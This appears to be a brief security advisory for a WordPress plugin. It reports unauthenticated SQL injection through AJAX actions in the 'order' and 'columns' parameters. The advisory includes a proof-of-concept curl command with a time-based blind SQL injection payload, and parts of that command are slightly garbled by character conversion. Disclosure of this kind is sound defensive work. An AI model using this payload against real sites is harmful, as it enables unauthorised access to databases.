The plugin does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections
order and columns parameters are affected curl ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=WPLFLA_get_log_dataℴ[][column]=0&columns;[][data]=(SELECT 7382 FROM (SELECT(SLEEP(5)))ameU)’